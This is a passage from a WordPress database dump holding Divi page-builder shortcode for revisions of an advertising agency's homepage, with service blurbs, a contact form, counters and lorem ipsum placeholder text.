author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:09:32','2020-08-07 20:09:32','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(594,1,'2020-08-07 20:10:06','2020-08-07 20:10:06','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde 